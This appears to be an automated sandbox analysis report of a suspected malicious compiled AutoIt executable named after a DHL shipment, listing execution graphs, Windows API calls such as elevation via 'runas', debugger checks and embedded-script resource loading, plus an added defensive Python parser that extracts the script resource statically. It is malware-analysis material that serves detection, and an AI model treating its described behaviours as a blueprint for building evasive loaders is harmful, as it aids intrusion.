106629->106635 106636 c6cc69 106629->106636 106630->106627 106633 c07667 59 API calls 106631->106633 106632->106423 106691->106419 106692->106417 106693->106421 106695 c63c3e 106694->106695 106696 c64475 FindFirstFileW 106694->106696 106695->106423 106696->106695 106697 c6448a FindClose 106696->106697 106697->106695 106698->106610 106808->106616 106852 c0818f 106851->106852 106855 c081aa 106851->106855 106853 c07e4f 59 API calls 106852->106853 106854 c08197 CharUpperBuffW 106853->106854 106854->106855 106855->106436 106857 c0f251 106856->106857 106859 c0f272 106857->106859 106892 c69e4a 89 API calls 4 library calls 106857->106892 106859->106476 106861 c0838d 106860->106861 106862 c3edbd 106860->106862 106863 c20db6 
Mailbox 59 API calls 106861->106863 106864 c08394 106863->106864 106865 c083b5 106864->106865 106893 c08634 59 API calls Mailbox 106864->106893 106865->106454 106865->106459 106867->106508 106868->106508 106869->106438 106870->106441 106871->106448 106872->106441 106873->106441 106874->106450 106875->106460 106876->106461 106877->106461 106879 c085ce 106878->106879 106885 c085f6 106878->106885 106880 c085dc 106879->106880 106882 c085c0 59 API calls 106879->106882 106881 c085e2 106880->106881 106883 c085c0 59 API calls 106880->106883 106884 c09c90 Mailbox 59 API calls 106881->106884 106881->106885 106882->106880 106883->106881 106884->106885 106885->106464 106886->106508 106887->106508 106888->106508 106889->106441 106891->106441 106892->106859 106893->106865 106894->106529 106895->106526 106896->106545 106897 c3fe27 106910 c1f944 106897->106910 106899 c3fe3d 106900 c3fe53 106899->106900 106901 c3febe 106899->106901 106919 c09e5d 60 API calls 106900->106919 106906 c0fce0 331 API calls 106901->106906 106903 c3fe92 106904 c4089c 106903->106904 106905 c3fe9a 106903->106905 106921 c69e4a 89 API calls 4 library calls 106904->106921 106920 c6834f 59 API calls Mailbox 106905->106920 106909 c3feb2 Mailbox 106906->106909 106911 c1f950 106910->106911 106912 c1f962 106910->106912 106913 c09d3c 60 API calls 106911->106913 106914 c1f991 106912->106914 106915 c1f968 106912->106915 106918 c1f95a 106913->106918 106917 c09d3c 60 API calls 106914->106917 106916 c20db6 Mailbox 59 API calls 106915->106916 106916->106918 106917->106918 106918->106899 106919->106903 106920->106909 106921->106909 106922 c01055 106927 c02649 106922->106927 106925 c22d40 __cinit 67 API calls 106926 c01064 106925->106926 106928 c07667 59 API calls 106927->106928 106929 c026b7 106928->106929 106934 c03582 106929->106934 106932 c02754 106933 c0105a 106932->106933 106937 c03416 59 API calls 2 library calls 106932->106937 106933->106925 106938 c035b0 106934->106938 106937->106932 106939 c035bd 106938->106939 
106940 c035a1 106938->106940 106939->106940 106941 c035c4 RegOpenKeyExW 106939->106941 106940->106932 106941->106940 106942 c035de RegQueryValueExW 106941->106942 106943 c03614 RegCloseKey 106942->106943 106944 c035ff 106942->106944 106943->106940 106944->106943 106945 c01066 106950 c0f76f 106945->106950 106947 c0106c 106948 c22d40 __cinit 67 API calls 106947->106948 106949 c01076 106948->106949 106951 c0f790 106950->106951 106983 c1ff03 106951->106983 106955 c0f7d7 106956 c07667 59 API calls 106955->106956 106957 c0f7e1 106956->106957 106958 c07667 59 API calls 106957->106958 106959 c0f7eb 106958->106959 106960 c07667 59 API calls 106959->106960 106961 c0f7f5 106960->106961 106962 c07667 59 API calls 106961->106962 106963 c0f833 106962->106963 106964 c07667 59 API calls 106963->106964 106965 c0f8fe 106964->106965 106993 c15f87 106965->106993 106969 c0f930 106970 c07667 59 API calls 106969->106970 106971 c0f93a 106970->106971 107021 c1fd9e 106971->107021 106973 c0f981 106974 c0f991 GetStdHandle 106973->106974 106975 c0f9dd 106974->106975 106976 c445ab 106974->106976 106977 c0f9e5 OleInitialize 106975->106977 106976->106975 106978 c445b4 106976->106978 106977->106947 107028 c66b38 64 API calls Mailbox 106978->107028 106980 c445bb 107029 c67207 CreateThread 106980->107029 106982 c445c7 CloseHandle 106982->106977 107030 c1ffdc 106983->107030 106986 c1ffdc 59 API calls 106987 c1ff45 106986->106987 106988 c07667 59 API calls 106987->106988 106989 c1ff51 106988->106989 106990 c07bcc 59 API calls 106989->106990 106991 c0f796 106990->106991 106992 c20162 6 API calls 106991->106992 106992->106955 106994 c07667 59 API calls 106993->106994 106995 c15f97 106994->106995 106996 c07667 59 API calls 106995->106996 106997 c15f9f 106996->106997 107037 c15a9d 106997->107037 107000 c15a9d 59 API calls 107001 c15faf 107000->107001 107002 c07667 59 API calls 107001->107002 107003 c15fba 107002->107003 107004 c20db6 Mailbox 59 API calls 107003->107004 107005 c0f908 107004->107005 107006 
c160f9 107005->107006 107007 c16107 107006->107007 107008 c07667 59 API calls 107007->107008 107009 c16112 107008->107009 107010 c07667 59 API calls 107009->107010 107011 c1611d 107010->107011 107012 c07667 59 API calls 107011->107012 107013 c16128 107012->107013 107014 c07667 59 API calls 107013->107014 107015 c16133 107014->107015 107016 c15a9d 59 API calls 107015->107016 107017 c1613e 107016->107017 107018 c20db6 Mailbox 59 API calls 107017->107018 107019 c16145 RegisterWindowMessageW 107018->107019 107019->106969 107022 c5576f 107021->107022 107023 c1fdae 107021->107023 107040 c69ae7 60 API calls 107022->107040 107024 c20db6 Mailbox 59 API calls 107023->107024 107026 c1fdb6 107024->107026 107026->106973 107027 c5577a 107028->106980 107029->106982 107041 c671ed 65 API calls 107029->107041 107031 c07667 59 API calls 107030->107031 107032 c1ffe7 107031->107032 107033 c07667 59 API calls 107032->107033 107034 c1ffef 107033->107034 107035 c07667 59 API calls 107034->107035 107036 c1ff3b 107035->107036 107036->106986 107038 c07667 59 API calls 107037->107038 107039 c15aa5 107038->107039 107039->107000 107040->107027 107042 c01016 107047 c04974 107042->107047 107045 c22d40 __cinit 67 API calls 107046 c01025 107045->107046 107048 c20db6 Mailbox 59 API calls 107047->107048 107049 c0497c 107048->107049 107050 c0101b 107049->107050 107054 c04936 107049->107054 107050->107045 107055 c04951 107054->107055 107056 c0493f 107054->107056 107058 c049a0 107055->107058 107057 c22d40 __cinit 67 API calls 107056->107057 107057->107055 107059 c07667 59 API calls 107058->107059 107060 c049b8 GetVersionExW 107059->107060 107061 c07bcc 59 API calls 107060->107061 107062 c049fb 107061->107062 107063 c07d2c 59 API calls 107062->107063 107072 c04a28 107062->107072 107064 c04a1c 107063->107064 107065 c07726 59 API calls 107064->107065 107065->107072 107066 c04a93 GetCurrentProcess IsWow64Process 107067 c04aac 107066->107067 107068 c04ac2 107067->107068 107069 c04b2b GetSystemInfo 
107067->107069 107082 c04b37 107068->107082 107071 c04af8 107069->107071 107070 c3d864 107071->107050 107072->107066 107072->107070 107075 c04ad4 107077 c04b37 2 API calls 107075->107077 107076 c04b1f GetSystemInfo 107078 c04ae9 107076->107078 107079 c04adc GetNativeSystemInfo 107077->107079 107078->107071 107080 c04aef FreeLibrary 107078->107080 107079->107078 107080->107071 107083 c04ad0 107082->107083 107084 c04b40 LoadLibraryA 107082->107084 107083->107075 107083->107076 107084->107083 107085 c04b51 GetProcAddress 107084->107085 107085->107083 107086 c4416f 107090 c55fe6 107086->107090 107088 c4417a 107089 c55fe6 85 API calls 107088->107089 107089->107088 107091 c56020 107090->107091 107095 c55ff3 107090->107095 107091->107088 107092 c56022 107102 c09328 84 API calls Mailbox 107092->107102 107093 c56027 107096 c09837 84 API calls 107093->107096 107095->107091 107095->107092 107095->107093 107099 c5601a 107095->107099 107097 c5602e 107096->107097 107098 c07b2e 59 API calls 107097->107098 107098->107091 107101 c095a0 59 API calls _wcsstr 107099->107101 107101->107091 107102->107093 107103 c0107d 107108 c0708b 107103->107108 107105 c0108c 107106 c22d40 __cinit 67 API calls 107105->107106 107107 c01096 107106->107107 107109 c0709b __write_nolock 107108->107109 107110 c07667 59 API calls 107109->107110 107111 c07151 107110->107111 107112 c04706 61 API calls 107111->107112 107113 c0715a 107112->107113 107139 c2050b 107113->107139 107116 c07cab 59 API calls 107117 c07173 107116->107117 107118 c03f74 59 API calls 107117->107118 107119 c07182 107118->107119 107120 c07667 59 API calls 107119->107120 107121 c0718b 107120->107121 107122 c07d8c 59 API calls 107121->107122 107123 c07194 RegOpenKeyExW 107122->107123 107124 c3e8b1 RegQueryValueExW 107123->107124 107128 c071b6 Mailbox 107123->107128 107125 c3e943 RegCloseKey 107124->107125 107126 c3e8ce 107124->107126 107125->107128 107138 c3e955 _wcscat Mailbox __wsetenvp 107125->107138 107127 c20db6 Mailbox 59 API calls 
                                                                                        Execution graph (node and edge list not rendered in this extraction). API nodes on the recorded paths: RegQueryValueExW, GetFullPathNameW, GetCurrentProcess, TerminateProcess, FreeLibrary, CharLowerBuffW, VirtualProtect; CRT helpers on the same paths: __write_nolock, _memmove, __cinit, _free, _strcat, _wcscpy, __wsetenvp, __malloc_crt. Two nodes lie outside the 00C00000 image: GetPEB at 013ED2D0 and Sleep at 013EC0E9.

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C03B68
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00C03B7A
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00CC52F8,00CC52E0,?,?), ref: 00C03BEB
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                          • Part of subcall function 00C1092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C03C14,00CC52F8,?,?,?), ref: 00C1096E
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C03C6F
                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CB7770,00000010), ref: 00C3D281
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00CC52F8,?,?,?), ref: 00C3D2B9
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CB4260,00CC52F8,?,?,?), ref: 00C3D33F
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C3D346
                                                                                          • Part of subcall function 00C03A46: GetSysColorBrush.USER32(0000000F), ref: 00C03A50
                                                                                          • Part of subcall function 00C03A46: LoadCursorW.USER32(00000000,00007F00), ref: 00C03A5F
                                                                                          • Part of subcall function 00C03A46: LoadIconW.USER32(00000063), ref: 00C03A76
                                                                                          • Part of subcall function 00C03A46: LoadIconW.USER32(000000A4), ref: 00C03A88
                                                                                          • Part of subcall function 00C03A46: LoadIconW.USER32(000000A2), ref: 00C03A9A
                                                                                          • Part of subcall function 00C03A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C03AC0
                                                                                          • Part of subcall function 00C03A46: RegisterClassExW.USER32(?), ref: 00C03B16
                                                                                          • Part of subcall function 00C039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C03A03
                                                                                          • Part of subcall function 00C039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C03A24
                                                                                          • Part of subcall function 00C039D5: ShowWindow.USER32(00000000,?,?), ref: 00C03A38
                                                                                          • Part of subcall function 00C039D5: ShowWindow.USER32(00000000,?,?), ref: 00C03A41
                                                                                          • Part of subcall function 00C0434A: _memset.LIBCMT ref: 00C04370
                                                                                          • Part of subcall function 00C0434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C04415
                                                                                        Strings
                                                                                        • This is a third-party compiled AutoIt script., xrefs: 00C3D279
                                                                                        • runas, xrefs: 00C3D33A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                        • API String ID: 529118366-3287110873
                                                                                        • Opcode ID: 60b216d536fa48c0f8f34c8566913cb8663d0f4aac87565205877db201577a4d
                                                                                        • Instruction ID: 13f05c7f15d576e4ff4c2bf786b932219193ff4a002ad0c57f36bacd38bcb71f
                                                                                        • Opcode Fuzzy Hash: 60b216d536fa48c0f8f34c8566913cb8663d0f4aac87565205877db201577a4d
                                                                                        • Instruction Fuzzy Hash: 0751FB70E08148AEDF05EBB4DC05FED77B8AF45740F004269F412B21E1CA716B85DB21

                                                                                        Control-flow Graph

                                                                                        control_flow_graph (edge list not rendered in this extraction): basic blocks 00C049A0-00C04B35 and 00C3D767-00C3D894. Path: GetVersionExW, then GetCurrentProcess/IsWow64Process; GetNativeSystemInfo at 00C04AE3 is reached only after two successful calls to 00C04B37, otherwise one of the GetSystemInfo blocks (00C04B1F or 00C04B2B) runs; FreeLibrary at 00C04AEF is conditionally reached afterwards.
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00C049CD
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        • GetCurrentProcess.KERNEL32(?,00C8FAEC,00000000,00000000,?), ref: 00C04A9A
                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00C04AA1
                                                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C04AE7
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00C04AF2
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00C04B23
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00C04B2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1986165174-0
                                                                                        • Opcode ID: f080de4fc1b0279e774d077cac127e79b07e589120a0b66ec4e65295a697a08d
                                                                                        • Instruction ID: 347bdbe57dd2e7b679328c68410e838a1b2abdc50f12ced2ff0adaf05da41e36
                                                                                        • Opcode Fuzzy Hash: f080de4fc1b0279e774d077cac127e79b07e589120a0b66ec4e65295a697a08d
                                                                                        • Instruction Fuzzy Hash: E291C5719897C0DECB35DB7894501ABBFF5AF2A300F4449ADD1D793A81D220BA08D76E

                                                                                        Control-flow Graph

                                                                                        control_flow_graph (edge list not rendered in this extraction): basic blocks 00C04E89-00C04EC6 and 00C3D933-00C3D98B. Path: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource; a failure at any step branches to the exit block at 00C04EC0.
                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C04D8E,?,?,00000000,00000000), ref: 00C04E99
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C04D8E,?,?,00000000,00000000), ref: 00C04EB0
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00C04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C04E2F), ref: 00C3D937
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00C04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C04E2F), ref: 00C3D94C
                                                                                        • LockResource.KERNEL32(00C04D8E,?,?,00C04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C04E2F,00000000), ref: 00C3D95F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: ac4025338dca9bcb8470d00d1ca4765717fb7b2eca8f9e510fa648742f4ebfee
                                                                                        • Instruction ID: 2a64fc9fdd8a7ea8e6c117d253e28bad260095d87be7d6b69933b53ebdf351c2
                                                                                        • Opcode Fuzzy Hash: ac4025338dca9bcb8470d00d1ca4765717fb7b2eca8f9e510fa648742f4ebfee
                                                                                        • Instruction Fuzzy Hash: 101151B5240700BFD7258B65EC48F67BBB9FBC5711F14416CF515C6190DB61D802C664
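Added triage example (Python written for this page; not code from the report, from Joe Sandbox or from the AutoIt project). The FindResourceExW(?, 0000000A, SCRIPT, ...) / LoadResource / SizeofResource / LockResource sequence listed above is the compiled-AutoIt stub locating its embedded script as an RT_RCDATA (type 0xA) resource named SCRIPT. The block below reproduces that lookup statically by walking the PE resource directory of the file on disk, so an analyst can confirm the resource is present and pull out its bytes without executing the sample. build_test_pe and the script bytes it embeds are a constructed, hypothetical minimal PE used only so the block runs offline; has_autoit_script_resource is this example's own heuristic (it mirrors what the stub looks up), not a signature taken from the report.

```python
import struct
import sys

RT_RCDATA = 10  # the 0xA type argument seen in the report's FindResourceExW call
SUBDIR = 0x80000000  # high bit of a directory entry: offset names a subdirectory / a string
MASK = 0x7FFFFFFF


def _rva_to_offset(rva, sections):
    """Map an RVA to a file offset via the section table; None if no section covers it."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    return None


def find_rcdata_resource(pe, name):
    """Static FindResourceExW/LoadResource/SizeofResource/LockResource: walk the
    type -> name -> language tree of .rsrc and return the RT_RCDATA resource `name`
    (case-insensitive) as bytes, or None when it is absent or the file is not a PE."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    data_dirs = opt + (96 if magic == 0x10B else 112)  # PE32 vs PE32+ optional header
    rsrc_rva = struct.unpack_from("<I", pe, data_dirs + 2 * 8)[0]  # data directory 2 = resources
    if rsrc_rva == 0:
        return None
    sections = []
    for i in range(nsec):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    base = _rva_to_offset(rsrc_rva, sections)  # file offset of the resource section
    if base is None:
        return None

    def entries(dir_off):  # IMAGE_RESOURCE_DIRECTORY: counts at +12, 8-byte entries from +16
        n_named, n_id = struct.unpack_from("<HH", pe, dir_off + 12)
        for i in range(n_named + n_id):
            yield struct.unpack_from("<II", pe, dir_off + 16 + 8 * i)

    def entry_name(field):  # section-relative offset of a length-prefixed UTF-16 string
        off = base + (field & MASK)
        n = struct.unpack_from("<H", pe, off)[0]
        return pe[off + 2:off + 2 + 2 * n].decode("utf-16-le")

    for type_field, type_child in entries(base):
        if type_field & SUBDIR or type_field != RT_RCDATA or not type_child & SUBDIR:
            continue
        for name_field, name_child in entries(base + (type_child & MASK)):
            if not name_field & SUBDIR or not name_child & SUBDIR:
                continue  # numeric ID instead of a string name, or a malformed tree
            if entry_name(name_field).upper() != name.upper():
                continue
            for _lang, data_ref in entries(base + (name_child & MASK)):
                if data_ref & SUBDIR:
                    continue
                data_rva, size = struct.unpack_from("<II", pe, base + data_ref)  # IMAGE_RESOURCE_DATA_ENTRY
                off = _rva_to_offset(data_rva, sections)
                return None if off is None else bytes(pe[off:off + size])
    return None


def has_autoit_script_resource(pe):
    """Triage heuristic (this example's assumption): the stub looks up RT_RCDATA 'SCRIPT'."""
    return find_rcdata_resource(pe, "SCRIPT") is not None


def build_test_pe(script, name="SCRIPT", with_resource=True):
    """Constructed sample, not a real program: a minimal PE32 image with a single .rsrc section."""
    rsrc_rva, rsrc_raw = 0x1000, 0x200
    blob = bytearray()
    if with_resource:
        # section-relative layout: type dir 0x00 -> name dir 0x18 -> lang dir 0x30 -> data entry 0x48,
        # UTF-16 name string at 0x58, resource bytes at 0x70
        blob += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", RT_RCDATA, SUBDIR | 0x18)
        blob += struct.pack("<IIHHHH", 0, 0, 0, 0, 1, 0) + struct.pack("<II", SUBDIR | 0x58, SUBDIR | 0x30)
        blob += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", 0, 0x48)
        blob += struct.pack("<IIII", rsrc_rva + 0x70, len(script), 0, 0)
        blob += struct.pack("<H", len(name)) + name.encode("utf-16-le")
        blob += b"\0" * (0x70 - len(blob)) + script
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", opt, 92, 16)  # NumberOfRvaAndSizes
    if with_resource:
        struct.pack_into("<II", opt, 96 + 2 * 8, rsrc_rva, len(blob))
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(blob), rsrc_rva, len(blob), rsrc_raw, 0, 0, 0, 0, 0x40000040)
    headers = dos + coff + opt + sec
    return bytes(headers + b"\0" * (rsrc_raw - len(headers)) + blob)


if __name__ == "__main__":
    # usage: python autoit_rsrc.py <file.exe>; with no argument the constructed sample is checked
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe(b"constructed script bytes")
    print("RT_RCDATA/SCRIPT present:", has_autoit_script_resource(data))
```

The bytes returned are the resource exactly as stored in the file; interpreting them is a separate step. The walk deliberately tolerates only the three-level tree the loader expects, so a file whose resource directory is corrupted or truncated yields None rather than an exception in the middle of a triage batch.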
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3964851224-0
                                                                                        • Opcode ID: 259b7752c5924096cd5c29109959ac7115f1e50f27dbb969240e2bb59859dd73
                                                                                        • Instruction ID: 31f1b789b32c36a515579b18d7f440b626809d757efa64f4a2c70eaddd464395
                                                                                        • Opcode Fuzzy Hash: 259b7752c5924096cd5c29109959ac7115f1e50f27dbb969240e2bb59859dd73
                                                                                        • Instruction Fuzzy Hash: 44926B70508341CFD724DF14C480B6AB7E5BF89304F24896DE89A8B3A2D7B5ED85DB92
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,00C3E398), ref: 00C6446A
                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00C6447B
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6448B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: 2874e0777d01ed093652822d8148b69831d1e3385d89cbfc7323699b63cd3f87
                                                                                        • Instruction ID: 2f5e25d239aeb7f272455f18f85e87e2f57399b1a1f8fc57904e22e17e90b187
                                                                                        • Opcode Fuzzy Hash: 2874e0777d01ed093652822d8148b69831d1e3385d89cbfc7323699b63cd3f87
                                                                                        • Instruction Fuzzy Hash: 94E0D8324105006B42246B38EC4E6FD775C9E45335F100719F935C10E0EB7499009699
                                                                                        Strings
                                                                                        • Variable must be of type 'Object'., xrefs: 00C43E62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Variable must be of type 'Object'.
                                                                                        • API String ID: 0-109567571
                                                                                        • Opcode ID: aee679bb19e342bf810d27fc7d1b7c6a0c5c672efe75663c1db1f1f3c8d4713c
                                                                                        • Instruction ID: 9def9b2ccb7f709eb44fdb9169c74b6978b2aeb7db0f7d9f7bbb1c14ef86513f
                                                                                        • Opcode Fuzzy Hash: aee679bb19e342bf810d27fc7d1b7c6a0c5c672efe75663c1db1f1f3c8d4713c
                                                                                        • Instruction Fuzzy Hash: 4DA2AE74A40215CFCB24CF59C480BAEB7B1FF59314F248969E925AB391D731EE82DB90
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C10A5B
                                                                                        • timeGetTime.WINMM ref: 00C10D16
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C10E53
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00C10E61
                                                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00C10EFA
                                                                                        • DestroyWindow.USER32 ref: 00C10F06
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C10F20
                                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00C44E83
                                                                                        • TranslateMessage.USER32(?), ref: 00C45C60
                                                                                        • DispatchMessageW.USER32(?), ref: 00C45C6E
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C45C82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
